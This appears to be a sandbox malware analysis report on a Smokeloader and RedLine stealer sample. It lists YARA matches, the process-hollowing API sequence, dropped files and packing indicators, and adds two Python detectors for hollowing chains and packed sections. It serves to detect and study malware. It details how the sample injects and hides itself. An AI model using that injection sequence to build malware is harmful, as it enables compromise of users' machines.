Source: explorer.exe, 00000003.00000002.2726467310.0000000006F94000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1562010966.0000000006F94000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: https://www.msn.com/en-us/news/opinion/decline-of-decorum-21-essential-manners-today-s-parents-fail-
Source: explorer.exe, 00000003.00000002.2726467310.0000000006F94000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1562010966.0000000006F94000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: https://www.msn.com/en-us/news/politics/california-workers-will-get-five-sick-days-instead-of-three-
Source: explorer.exe, 00000003.00000002.2726467310.0000000006F94000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1562010966.0000000006F94000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: https://www.msn.com/en-us/news/world/pastor-of-atlanta-based-megachurch-faces-backlash-after-controv
Source: explorer.exe, 00000003.00000002.2726467310.0000000006F94000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1562010966.0000000006F94000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: https://www.msn.com/en-us/news/world/ukraine-live-briefing-biden-does-worry-house-drama-will-impact-
Source: explorer.exe, 00000003.00000002.2726467310.0000000006F94000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1562010966.0000000006F94000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: https://www.msn.com/en-us/weather/topstories/california-s-reservoirs-runneth-over-in-astounding-reve
Source: explorer.exe, 00000003.00000002.2726467310.0000000006F94000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1562010966.0000000006F94000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: https://www.msn.com:443/en-us/feed

                Key, Mouse, Clipboard, Microphone and Screen Capturing

Source: Yara match | File source: 5.2.hdeufvw.8615a0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 6.2.hdeufvw.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 2.2.e6reA52T4I.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.e6reA52T4I.exe.9315a0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000006.00000002.1863904346.0000000001F61000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000002.00000002.1577083390.0000000002341000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000006.00000002.1863662169.0000000000500000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000003.00000002.2727880328.00000000083F1000.00000020.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000003.00000002.2724026531.0000000000B31000.00000020.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000002.00000002.1576706084.0000000000540000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY

                System Summary

Source: 00000006.00000002.1863904346.0000000001F61000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Smokeloader_4e31426e Author: unknown
Source: 00000002.00000002.1577083390.0000000002341000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Smokeloader_4e31426e Author: unknown
Source: 00000006.00000002.1863662169.0000000000500000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Smokeloader_4e31426e Author: unknown
Source: 00000005.00000002.1813482069.000000000098C000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
Source: 00000000.00000002.1511973932.0000000000ABD000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
Source: 00000003.00000002.2727880328.00000000083F1000.00000020.80000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Smokeloader_4e31426e Author: unknown
Source: 00000003.00000002.2724026531.0000000000B31000.00000020.80000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Smokeloader_4e31426e Author: unknown
Source: 00000002.00000002.1576706084.0000000000540000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Smokeloader_4e31426e Author: unknown
Source: C:\Users\user\Desktop\e6reA52T4I.exe | Code function: 0_2_00930110 VirtualAlloc,GetModuleFileNameA,CreateProcessA,VirtualFree,VirtualAlloc,Wow64GetThreadContext,ReadProcessMemory,NtUnmapViewOfSection,VirtualAllocEx,NtWriteVirtualMemory,NtWriteVirtualMemory,WriteProcessMemory,Wow64SetThreadContext,ResumeThread,ExitProcess,0_2_00930110
Source: C:\Users\user\Desktop\e6reA52T4I.exe | Code function: 2_2_0040180C Sleep,NtTerminateProcess,2_2_0040180C
Source: C:\Users\user\Desktop\e6reA52T4I.exe | Code function: 2_2_00401818 Sleep,NtTerminateProcess,2_2_00401818
Source: C:\Users\user\Desktop\e6reA52T4I.exe | Code function: 2_2_00401822 Sleep,NtTerminateProcess,2_2_00401822
Source: C:\Users\user\Desktop\e6reA52T4I.exe | Code function: 2_2_00401826 Sleep,NtTerminateProcess,2_2_00401826
Source: C:\Users\user\Desktop\e6reA52T4I.exe | Code function: 2_2_00401834 Sleep,NtTerminateProcess,2_2_00401834
Source: C:\Users\user\AppData\Roaming\hdeufvw | Code function: 5_2_00860110 VirtualAlloc,GetModuleFileNameA,CreateProcessA,VirtualFree,VirtualAlloc,Wow64GetThreadContext,ReadProcessMemory,NtUnmapViewOfSection,VirtualAllocEx,NtWriteVirtualMemory,NtWriteVirtualMemory,WriteProcessMemory,Wow64SetThreadContext,ResumeThread,ExitProcess,5_2_00860110
Source: C:\Users\user\AppData\Roaming\hdeufvw | Code function: 6_2_0040180C Sleep,NtTerminateProcess,6_2_0040180C
Source: C:\Users\user\AppData\Roaming\hdeufvw | Code function: 6_2_00401818 Sleep,NtTerminateProcess,6_2_00401818
Source: C:\Users\user\AppData\Roaming\hdeufvw | Code function: 6_2_00401822 Sleep,NtTerminateProcess,6_2_00401822
Source: C:\Users\user\AppData\Roaming\hdeufvw | Code function: 6_2_00401826 Sleep,NtTerminateProcess,6_2_00401826
Source: C:\Users\user\AppData\Roaming\hdeufvw | Code function: 6_2_00401834 Sleep,NtTerminateProcess,6_2_00401834
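The API chain in 0_2_00930110 and 5_2_00860110 is the textbook process-hollowing (RunPE) sequence: the stub re-launches its own image with CreateProcessA, reads the child's thread context with Wow64GetThreadContext, unmaps the child's original image with NtUnmapViewOfSection, allocates and writes the unpacked payload in with VirtualAllocEx and NtWriteVirtualMemory/WriteProcessMemory, points the context at the new entry point with Wow64SetThreadContext and resumes the thread. The following is an added example and not Joe Sandbox code: a small detector that flags that ordered chain in a per-process API trace. The trace format (process index, API name) is an assumption made for this demonstration, and the sample trace is constructed from the call list above.

```python
"""Flag the process-hollowing (RunPE) call chain in a per-process API trace.

Added example; not part of the Joe Sandbox report or its engine.  The trace
shape, a list of (process_index, api_name) tuples, is an assumption for the
demonstration; a real trace comes from a sandbox hook log or ETW.
"""
from collections import defaultdict

# Ordered milestones of the hollowing chain seen in 0_2_00930110 / 5_2_00860110.
# Each step accepts any of the listed spellings (Nt*/Zw* and Win32 forms are
# equivalent for detection purposes).
HOLLOWING_STEPS = [
    ("spawn child",               {"CreateProcessA", "CreateProcessW", "NtCreateUserProcess"}),
    ("read child thread context", {"Wow64GetThreadContext", "GetThreadContext", "NtGetContextThread"}),
    ("unmap original image",      {"NtUnmapViewOfSection", "ZwUnmapViewOfSection"}),
    ("allocate in child",         {"VirtualAllocEx", "NtAllocateVirtualMemory"}),
    ("write payload into child",  {"WriteProcessMemory", "NtWriteVirtualMemory"}),
    ("redirect entry point",      {"Wow64SetThreadContext", "SetThreadContext", "NtSetContextThread"}),
    ("resume child",              {"ResumeThread", "NtResumeThread"}),
]


def match_hollowing(calls):
    """Return the matched step names if `calls` (the APIs of ONE process, in
    call order) contains the whole chain as an ordered subsequence, else []."""
    matched = []
    step = 0
    for api in calls:
        if step < len(HOLLOWING_STEPS) and api in HOLLOWING_STEPS[step][1]:
            matched.append(HOLLOWING_STEPS[step][0])
            step += 1
    return matched if step == len(HOLLOWING_STEPS) else []


def scan_trace(trace):
    """Group a (process_index, api) trace per process and report the ones
    that hollow a child.  Returns {process_index: [step names]}."""
    per_proc = defaultdict(list)
    for proc, api in trace:
        per_proc[proc].append(api)
    hits = {}
    for proc, calls in per_proc.items():
        steps = match_hollowing(calls)
        if steps:
            hits[proc] = steps
    return hits


# Constructed sample trace.  Process 0 reproduces the call list reported for
# 0_2_00930110; the unmap step is what separates hollowing from plain
# injection.  Process 3 only allocates/writes/creates a remote thread, which
# is injection but not hollowing, so it must not match.
SAMPLE_TRACE = [
    (0, "VirtualAlloc"), (0, "GetModuleFileNameA"), (0, "CreateProcessA"),
    (0, "VirtualFree"), (0, "VirtualAlloc"), (0, "Wow64GetThreadContext"),
    (0, "ReadProcessMemory"), (0, "NtUnmapViewOfSection"), (0, "VirtualAllocEx"),
    (0, "NtWriteVirtualMemory"), (0, "NtWriteVirtualMemory"),
    (0, "WriteProcessMemory"), (0, "Wow64SetThreadContext"), (0, "ResumeThread"),
    (0, "ExitProcess"),
    (3, "VirtualAllocEx"), (3, "WriteProcessMemory"), (3, "CreateRemoteThread"),
]

if __name__ == "__main__":
    for proc, steps in scan_trace(SAMPLE_TRACE).items():
        print(f"process {proc}: process hollowing, {len(steps)} steps: {', '.join(steps)}")
```

The matcher deliberately requires the unmap step: VirtualAllocEx plus WriteProcessMemory alone is ordinary injection (the explorer.exe thread injection this report also flags) and would drown the signal. The trailing Sleep,NtTerminateProcess functions in 2_2_0040180C and friends are the watchdog/exit stubs of the unpacked stage and are not part of the chain.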
Source: C:\Users\user\Desktop\e6reA52T4I.exe | Code function: 0_2_0040F827
Source: C:\Users\user\Desktop\e6reA52T4I.exe | Code function: 0_2_0040F489
Source: C:\Users\user\Desktop\e6reA52T4I.exe | Code function: 0_2_0040FFE1
Source: C:\Users\user\Desktop\e6reA52T4I.exe | Code function: 0_2_0040EFF4
Source: C:\Users\user\Desktop\e6reA52T4I.exe | Code function: 0_2_0040FBF9
Source: C:\Windows\explorer.exe | Code function: 3_2_00B3281C
Source: C:\Windows\explorer.exe | Code function: 3_2_083F281C
Source: e6reA52T4I.exe, 00000000.00000002.1509841472.00000000007B6000.00000002.00000001.01000000.00000003.sdmp | Binary or memory string: OriginalFilenameBlamer.exe< vs e6reA52T4I.exe
Source: e6reA52T4I.exe, 00000002.00000000.1507866565.00000000007B6000.00000002.00000001.01000000.00000003.sdmp | Binary or memory string: OriginalFilenameBlamer.exe< vs e6reA52T4I.exe
Source: e6reA52T4I.exe | Binary or memory string: OriginalFilenameBlamer.exe< vs e6reA52T4I.exe
Source: e6reA52T4I.exe | Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: 00000006.00000002.1863904346.0000000001F61000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Smokeloader_4e31426e reference_sample = 1ce643981821b185b8ad73b798ab5c71c6c40e1f547b8e5b19afdaa4ca2a5174, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = cf6d8615643198bc53527cb9581e217f8a39760c2e695980f808269ebe791277, id = 4e31426e-d62e-4b6d-911b-4223e1f6adef, last_modified = 2021-08-23
Source: 00000002.00000002.1577083390.0000000002341000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Smokeloader_4e31426e reference_sample = 1ce643981821b185b8ad73b798ab5c71c6c40e1f547b8e5b19afdaa4ca2a5174, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = cf6d8615643198bc53527cb9581e217f8a39760c2e695980f808269ebe791277, id = 4e31426e-d62e-4b6d-911b-4223e1f6adef, last_modified = 2021-08-23
Source: 00000006.00000002.1863662169.0000000000500000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Smokeloader_4e31426e reference_sample = 1ce643981821b185b8ad73b798ab5c71c6c40e1f547b8e5b19afdaa4ca2a5174, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = cf6d8615643198bc53527cb9581e217f8a39760c2e695980f808269ebe791277, id = 4e31426e-d62e-4b6d-911b-4223e1f6adef, last_modified = 2021-08-23
Source: 00000005.00000002.1813482069.000000000098C000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
Source: 00000000.00000002.1511973932.0000000000ABD000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
Source: 00000003.00000002.2727880328.00000000083F1000.00000020.80000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Smokeloader_4e31426e reference_sample = 1ce643981821b185b8ad73b798ab5c71c6c40e1f547b8e5b19afdaa4ca2a5174, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = cf6d8615643198bc53527cb9581e217f8a39760c2e695980f808269ebe791277, id = 4e31426e-d62e-4b6d-911b-4223e1f6adef, last_modified = 2021-08-23
Source: 00000003.00000002.2724026531.0000000000B31000.00000020.80000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Smokeloader_4e31426e reference_sample = 1ce643981821b185b8ad73b798ab5c71c6c40e1f547b8e5b19afdaa4ca2a5174, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = cf6d8615643198bc53527cb9581e217f8a39760c2e695980f808269ebe791277, id = 4e31426e-d62e-4b6d-911b-4223e1f6adef, last_modified = 2021-08-23
Source: 00000002.00000002.1576706084.0000000000540000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Smokeloader_4e31426e reference_sample = 1ce643981821b185b8ad73b798ab5c71c6c40e1f547b8e5b19afdaa4ca2a5174, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = cf6d8615643198bc53527cb9581e217f8a39760c2e695980f808269ebe791277, id = 4e31426e-d62e-4b6d-911b-4223e1f6adef, last_modified = 2021-08-23
Source: e6reA52T4I.exe | Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: hdeufvw.3.dr | Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: classification engine | Classification label: mal100.troj.evad.winEXE@6/2@2/1
Source: C:\Users\user\Desktop\e6reA52T4I.exe | Code function: 0_2_00AC3280 CreateToolhelp32Snapshot,Module32First,0_2_00AC3280
Source: C:\Windows\explorer.exe | Code function: 3_2_00B3368C CoCreateInstance,3_2_00B3368C
Source: C:\Windows\explorer.exe | File created: C:\Users\user\AppData\Roaming\hdeufvw
Source: C:\Users\user\Desktop\e6reA52T4I.exe | Command line argument: zj\ (0_2_00425D20)
Source: C:\Users\user\Desktop\e6reA52T4I.exe | Command line argument: GhB (0_2_00425D20)
Source: C:\Users\user\Desktop\e6reA52T4I.exe | Command line argument: T(7a (0_2_00425D20)
Source: C:\Users\user\Desktop\e6reA52T4I.exe | Command line argument: 9X"e (0_2_00425D20)
Source: C:\Users\user\Desktop\e6reA52T4I.exe | Command line argument: Kn6B (0_2_00425D20)
Source: C:\Users\user\Desktop\e6reA52T4I.exe | Command line argument: Wqu (0_2_00425D20)
Source: C:\Users\user\Desktop\e6reA52T4I.exe | Command line argument: QMrQ (0_2_00425D20)
Source: C:\Users\user\Desktop\e6reA52T4I.exe | Command line argument: JG__ (0_2_00425D20)
Source: C:\Users\user\Desktop\e6reA52T4I.exe | Command line argument: qu|a (0_2_00425D20)
Source: C:\Users\user\Desktop\e6reA52T4I.exe | Command line argument: ~=l@ (0_2_00425D20)
Source: C:\Users\user\Desktop\e6reA52T4I.exe | Command line argument: a*oJ (0_2_00425D20)
Source: C:\Users\user\Desktop\e6reA52T4I.exe | Command line argument: =)W{ (0_2_00425D20)
Source: C:\Users\user\Desktop\e6reA52T4I.exe | Command line argument: 35e (0_2_00425D20)
Source: C:\Users\user\Desktop\e6reA52T4I.exe | Command line argument: $iEz (0_2_00425D20)
Source: C:\Users\user\Desktop\e6reA52T4I.exe | Command line argument: X!pq (0_2_00425D20)
Source: C:\Users\user\Desktop\e6reA52T4I.exe | Command line argument: gew (0_2_00425D20)
Source: C:\Users\user\Desktop\e6reA52T4I.exe | Command line argument: ogr( (0_2_00425D20)
Source: C:\Users\user\Desktop\e6reA52T4I.exe | Command line argument: o%HQ (0_2_00425D20)
Source: C:\Users\user\Desktop\e6reA52T4I.exe | Command line argument: \Sj= (0_2_00425D20)
Source: C:\Users\user\Desktop\e6reA52T4I.exe | Command line argument: WTE (0_2_00425D20)
Source: C:\Users\user\Desktop\e6reA52T4I.exe | Command line argument: [l1h (0_2_00425D20)
Source: C:\Users\user\Desktop\e6reA52T4I.exe | Command line argument: fPT (0_2_00425D20)
Source: C:\Users\user\Desktop\e6reA52T4I.exe | Command line argument: |59M (0_2_00425D20)
Source: C:\Users\user\Desktop\e6reA52T4I.exe | Command line argument: O2l[ (0_2_00425D20)
Source: C:\Users\user\Desktop\e6reA52T4I.exe | Command line argument: k'Z# (0_2_00425D20)
Source: C:\Users\user\Desktop\e6reA52T4I.exe | Command line argument: hRjT (0_2_00425D20)
Source: C:\Users\user\Desktop\e6reA52T4I.exe | Command line argument: msX? (0_2_00425D20)
Source: C:\Users\user\Desktop\e6reA52T4I.exe | Command line argument: c<z (0_2_00425D20)
Source: C:\Users\user\Desktop\e6reA52T4I.exe | Command line argument: `*T (0_2_00425D20)
Source: C:\Users\user\Desktop\e6reA52T4I.exe | Command line argument: Yx@t (0_2_00425D20)
Source: e6reA52T4I.exe | Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: C:\Users\user\Desktop\e6reA52T4I.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: e6reA52T4I.exe | ReversingLabs: Detection: 87%
Source: unknown | Process created: C:\Users\user\Desktop\e6reA52T4I.exe "C:\Users\user\Desktop\e6reA52T4I.exe"
Source: C:\Users\user\Desktop\e6reA52T4I.exe | Process created: C:\Users\user\Desktop\e6reA52T4I.exe "C:\Users\user\Desktop\e6reA52T4I.exe"
Source: unknown | Process created: C:\Users\user\AppData\Roaming\hdeufvw C:\Users\user\AppData\Roaming\hdeufvw
Source: C:\Users\user\AppData\Roaming\hdeufvw | Process created: C:\Users\user\AppData\Roaming\hdeufvw C:\Users\user\AppData\Roaming\hdeufvw
Source: C:\Users\user\Desktop\e6reA52T4I.exe | Section loaded: apphelp.dll
Source: C:\Users\user\Desktop\e6reA52T4I.exe | Section loaded: msimg32.dll
Source: C:\Users\user\Desktop\e6reA52T4I.exe | Section loaded: uxtheme.dll
Source: C:\Windows\explorer.exe | Section loaded: windows.cloudstore.schema.shell.dll
Source: C:\Windows\explorer.exe | Section loaded: taskschd.dll
Source: C:\Windows\explorer.exe | Section loaded: webio.dll
Source: C:\Windows\explorer.exe | Section loaded: vcruntime140_1.dll
Source: C:\Windows\explorer.exe | Section loaded: vcruntime140.dll
Source: C:\Windows\explorer.exe | Section loaded: msvcp140.dll
Source: C:\Windows\explorer.exe | Section loaded: vcruntime140.dll
Source: C:\Windows\explorer.exe | Section loaded: vcruntime140.dll
Source: C:\Users\user\AppData\Roaming\hdeufvw | Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Roaming\hdeufvw | Section loaded: msimg32.dll
Source: C:\Users\user\AppData\Roaming\hdeufvw | Section loaded: uxtheme.dll
Source: C:\Windows\explorer.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{50CE75BC-766C-4136-BF5E-9197AA23569E}\InProcServer32

                Data Obfuscation

Source: C:\Users\user\Desktop\e6reA52T4I.exe | Unpacked PE file: 2.2.e6reA52T4I.exe.400000.0.unpack .text:ER;.data:W;.rsrc:R; vs .text:EW;
Source: C:\Users\user\AppData\Roaming\hdeufvw | Unpacked PE file: 6.2.hdeufvw.400000.0.unpack .text:ER;.data:W;.rsrc:R; vs .text:EW;
Source: C:\Users\user\Desktop\e6reA52T4I.exe | Code function: 0_2_004117B2 LoadLibraryW,GetProcAddress,GetProcAddress,EncodePointer,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,0_2_004117B2
Source: C:\Users\user\Desktop\e6reA52T4I.exe | Code function: 0_2_00408569 push ecx; ret 0_2_0040857C
Source: C:\Users\user\Desktop\e6reA52T4I.exe | Code function: 0_2_0040B375 push ecx; ret 0_2_0040B388
Source: C:\Users\user\Desktop\e6reA52T4I.exe | Code function: 0_2_0093198B push ebx; iretd 0_2_009319B7
Source: C:\Users\user\Desktop\e6reA52T4I.exe | Code function: 0_2_00931970 push ebx; iretd 0_2_009319B7
Source: C:\Users\user\Desktop\e6reA52T4I.exe | Code function: 0_2_00931977 push ebx; iretd 0_2_009319B7
Source: C:\Users\user\Desktop\e6reA52T4I.exe | Code function: 0_2_00AC901F pushad ; iretd 0_2_00AC9025
Source: C:\Users\user\Desktop\e6reA52T4I.exe | Code function: 0_2_00AC4193 push ebx; iretd 0_2_00AC41BE
Source: C:\Users\user\Desktop\e6reA52T4I.exe | Code function: 0_2_00AC417E push ebx; iretd 0_2_00AC41BE
Source: C:\Users\user\Desktop\e6reA52T4I.exe | Code function: 2_2_004011D0 push ebx; iretd 2_2_00401217
Source: C:\Users\user\Desktop\e6reA52T4I.exe | Code function: 2_2_004011D7 push ebx; iretd 2_2_00401217
Source: C:\Users\user\Desktop\e6reA52T4I.exe | Code function: 2_2_004011EB push ebx; iretd 2_2_00401217
Source: C:\Windows\explorer.exe | Code function: 3_2_00B31178 push 00000015h; ret 3_2_00B3117A
Source: C:\Windows\explorer.exe | Code function: 3_2_083F1178 push 00000015h; ret 3_2_083F117A
Source: C:\Users\user\AppData\Roaming\hdeufvw | Code function: 5_2_0086198B push ebx; iretd 5_2_008619B7
Source: C:\Users\user\AppData\Roaming\hdeufvw | Code function: 5_2_00861977 push ebx; iretd 5_2_008619B7
Source: C:\Users\user\AppData\Roaming\hdeufvw | Code function: 5_2_00861970 push ebx; iretd 5_2_008619B7
Source: C:\Users\user\AppData\Roaming\hdeufvw | Code function: 5_2_009981DF pushad ; iretd 5_2_009981E5
Source: C:\Users\user\AppData\Roaming\hdeufvw | Code function: 5_2_0099333E push ebx; iretd 5_2_0099337E
Source: C:\Users\user\AppData\Roaming\hdeufvw | Code function: 5_2_00993353 push ebx; iretd 5_2_0099337E
Source: C:\Users\user\AppData\Roaming\hdeufvw | Code function: 6_2_004011D0 push ebx; iretd 6_2_00401217
Source: C:\Users\user\AppData\Roaming\hdeufvw | Code function: 6_2_004011D7 push ebx; iretd 6_2_00401217
Source: C:\Users\user\AppData\Roaming\hdeufvw | Code function: 6_2_004011EB push ebx; iretd 6_2_00401217
Source: e6reA52T4I.exe | Static PE information: section name: .text entropy: 7.320070104865159
Source: hdeufvw.3.dr | Static PE information: section name: .text entropy: 7.320070104865159
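Two static indicators in this report come from the section table alone: the .text characteristics decoded under System Summary (IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, i.e. 0x60000020) and, here, a .text entropy of 7.32 bits per byte, which is far above what compiled x86 code produces and is the usual sign of a packed or encrypted code section; the "Unpacked PE file ... .text:ER vs .text:EW" line then records that the section becomes writable once the stub is running. The following is an added example, not Joe Sandbox code, that reproduces both checks on a section header and its bytes. The section contents are constructed (a repeated prologue for the clean case, random bytes standing in for a packed stub), not taken from the sample, and the 7.0 threshold is an assumption.

```python
"""Decode PE section Characteristics and score section entropy.

Added example; not part of the Joe Sandbox report.  The two constructed
sections below stand in for a normal compiler-emitted .text and for a packed,
writable .text; neither is data from the analysed sample.
"""
import math
import os

# Subset of IMAGE_SECTION_HEADER.Characteristics bits (winnt.h values).
IMAGE_SCN_CNT_CODE = 0x00000020
IMAGE_SCN_CNT_INITIALIZED_DATA = 0x00000040
IMAGE_SCN_CNT_UNINITIALIZED_DATA = 0x00000080
IMAGE_SCN_MEM_EXECUTE = 0x20000000
IMAGE_SCN_MEM_READ = 0x40000000
IMAGE_SCN_MEM_WRITE = 0x80000000

FLAG_NAMES = {
    IMAGE_SCN_CNT_CODE: "IMAGE_SCN_CNT_CODE",
    IMAGE_SCN_CNT_INITIALIZED_DATA: "IMAGE_SCN_CNT_INITIALIZED_DATA",
    IMAGE_SCN_CNT_UNINITIALIZED_DATA: "IMAGE_SCN_CNT_UNINITIALIZED_DATA",
    IMAGE_SCN_MEM_EXECUTE: "IMAGE_SCN_MEM_EXECUTE",
    IMAGE_SCN_MEM_READ: "IMAGE_SCN_MEM_READ",
    IMAGE_SCN_MEM_WRITE: "IMAGE_SCN_MEM_WRITE",
}

# Assumed cut-off: compiled x86 code usually lands around 5.5-6.5 bits/byte;
# compressed or encrypted payloads approach 8.0.
PACKED_ENTROPY_THRESHOLD = 7.0


def decode_characteristics(flags):
    """Names of the known Characteristics bits set in `flags`, in bit order."""
    return [name for bit, name in sorted(FLAG_NAMES.items()) if flags & bit]


def shannon_entropy(data):
    """Shannon entropy of a byte string in bits per byte (0.0 for empty input)."""
    if not data:
        return 0.0
    counts = [0] * 256
    for b in data:
        counts[b] += 1
    n = len(data)
    return -sum(c / n * math.log2(c / n) for c in counts if c)


def assess_section(name, flags, data):
    """Return the findings for one section: W+X rights (the .text:EW the
    report sees after unpacking) and near-random code bytes (entropy 7.32)."""
    findings = []
    if flags & IMAGE_SCN_MEM_EXECUTE and flags & IMAGE_SCN_MEM_WRITE:
        findings.append("writable and executable")
    if flags & IMAGE_SCN_CNT_CODE and shannon_entropy(data) > PACKED_ENTROPY_THRESHOLD:
        findings.append("high-entropy code section (likely packed)")
    return findings


# Constructed sections as (name, Characteristics, raw bytes).
CLEAN_TEXT = (".text", 0x60000020, bytes([0x55, 0x8B, 0xEC, 0x83, 0xEC, 0x10] * 200))
PACKED_TEXT = (".text", 0xE0000020, os.urandom(4096))

if __name__ == "__main__":
    for name, flags, data in (CLEAN_TEXT, PACKED_TEXT):
        print(name, hex(flags), decode_characteristics(flags),
              f"entropy={shannon_entropy(data):.2f}",
              assess_section(name, flags, data) or "no finding")
```

Entropy alone is not a packer verdict (a resource section full of PNGs scores just as high), which is why the check is gated on IMAGE_SCN_CNT_CODE; the pairing of a high-entropy code section with a later write to that same section, as in the unpack lines above, is the stronger signal.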
Source: C:\Windows\explorer.exe | File created: C:\Users\user\AppData\Roaming\hdeufvw (dropped file)

                Hooking and other Techniques for Hiding and Protection

Source: C:\Windows\explorer.exe | File deleted: c:\users\user\desktop\e6rea52t4i.exe
Source: C:\Windows\explorer.exe | File opened: C:\Users\user\AppData\Roaming\hdeufvw:Zone.Identifier read attributes | delete
Source: C:\Users\user\Desktop\e6reA52T4I.exe | Code function: 0_2_004257E0 GetConsoleProcessList,CharUpperA,CharToOemBuffA,CharToOemBuffA,GetConsoleProcessList,WriteProfileStringW,RegisterClassA,SetThreadContext,GetFileAttributesExA,_fputc,GetConsoleAliasW,WriteConsoleOutputCharacterA,GetFileType,GetConsoleAliasW,WriteConsoleOutputCharacterA,GetFileType,GlobalAlloc,GetWindowsDirectoryW,SetThreadAffinityMask,SetProcessShutdownParameters,GetWindowsDirectoryW,SetThreadAffinityMask,ReadConsoleOutputCharacterA,SetProcessShutdownParameters,BuildCommDCBAndTimeoutsW,GetVolumeInformationW,GetConsoleAliasA,SetProcessShutdownParameters,GetPrivateProfileStringW,GetPrivateProfileStringW,AddAtomA,GetSystemWindowsDirectoryW,DisconnectNamedPipe,AddAtomA,GetSystemWindowsDirectoryW,DisconnectNamedPipe,GetConsoleCursorInfo,VirtualProtect,InterlockedDecrement,GetCharWidthFloatW,ClearEventLogA,InterlockedDecrement,GetCharWidthFloatW,ClearEventLogA,GlobalUnfix,OpenWaitableTimerW,GlobalFlags,LocalFlags,LoadLibraryW,GetConsoleCursorInfo,SetConsole